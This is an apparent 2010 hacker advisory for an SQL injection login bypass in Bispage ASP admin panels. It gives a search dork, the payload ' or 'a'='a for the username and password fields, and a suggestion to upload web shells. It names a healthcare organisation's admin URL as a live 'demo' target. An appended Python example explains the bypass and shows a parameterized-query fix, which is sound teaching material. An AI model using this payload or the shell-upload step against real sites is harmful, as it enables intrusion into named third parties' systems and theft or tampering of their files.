Bispage suffers from a remote SQL injection vulnerability that allows for authentication bypass.
# Exploit Title: [ bispage Bypass Vulnerability]
# Author: [SaMir-BonD] EGY@hotmail.com
#Organization : TEAM-DZ
#Formal sites : t00ls.org - h4kz.com
# Software Link: [N/A]
# Script's Language: [.ASP]
# Tested on: [Windows PHP/4.3.11 os]
#Dork :"Developed by Bispage.com"
# CVE : [if exists]
# Code : [exploit code]
#Site page : bispage.com >> Infected :D
# Date: [23-2-2010]
*Hey dudes how are you doin' :D
*It's an easy bypass vuln, just see these steps:
________________________________________________
1) Victim.com/script/admin
2) User Between Brackets : (' or 'a'='a)
Pass Between Brackets : (' or 'a'='a)
3) Enjoy Uploading Shells :D ( upload ASP shell types to be able to read/modify/download Files)
4)Demo : https://www.bethesdahealthcare.net/bethesdahealthcare/admin/
https://Bispage.com/admin
*If you hacked DEmo you will be balls :D
#Greetz to:
-----------
[TEAM-DZ: maxi32-noureddin-Skins-TheMoorish-Dr.Genius-IslamLee-M4st3r]
HcJ-Mr.Mero-Laqi@hajdin-Sh3ko-EGY-MaF!4-Trackoda-Dr.Mozo-TNT_HACKER-Elkatrez-DataFr4ck3r
& all those who know Samir-BonD(oXide)
---> h4kz.com & t00ls.org
Note : La Elah Ella ALLAH .. Muhammad Rasool ALLAH..
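
Why the string from step 2 passes a login check, and how a parameterized query stops it. This is an added example, not code from the advisory or from Bispage: the table layout, the concatenated query and all function names are assumptions, and the account row is constructed sample data.

```python
import sqlite3

PAYLOAD = "' or 'a'='a"  # the string given in step 2 of the advisory


def make_db():
    """Constructed sample data: an in-memory table with one admin account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin', 'correct-horse')")
    return db


def build_concat_query(user, password):
    # Assumed vulnerable pattern: form input pasted straight into the SQL text.
    return ("SELECT COUNT(*) FROM admins WHERE username='" + user +
            "' AND password='" + password + "'")


def login_concat(db, user, password):
    # The quotes in the input close the string literals, so the WHERE clause
    # becomes: username='' OR ('a'='a' AND password='') OR 'a'='a'
    # which is true for every row.
    return db.execute(build_concat_query(user, password)).fetchone()[0] > 0


def login_param(db, user, password):
    # Hardened form: placeholders keep the input as data, never as SQL syntax,
    # so the payload is compared literally against the stored values.
    row = db.execute(
        "SELECT COUNT(*) FROM admins WHERE username=? AND password=?",
        (user, password)).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    db = make_db()
    print(build_concat_query(PAYLOAD, PAYLOAD))
    print("concatenated, payload :", login_concat(db, PAYLOAD, PAYLOAD))
    print("parameterized, payload:", login_param(db, PAYLOAD, PAYLOAD))
    print("parameterized, valid  :", login_param(db, "admin", "correct-horse"))
```

A production login would also store a salted password hash rather than the plaintext column used here to keep the example short.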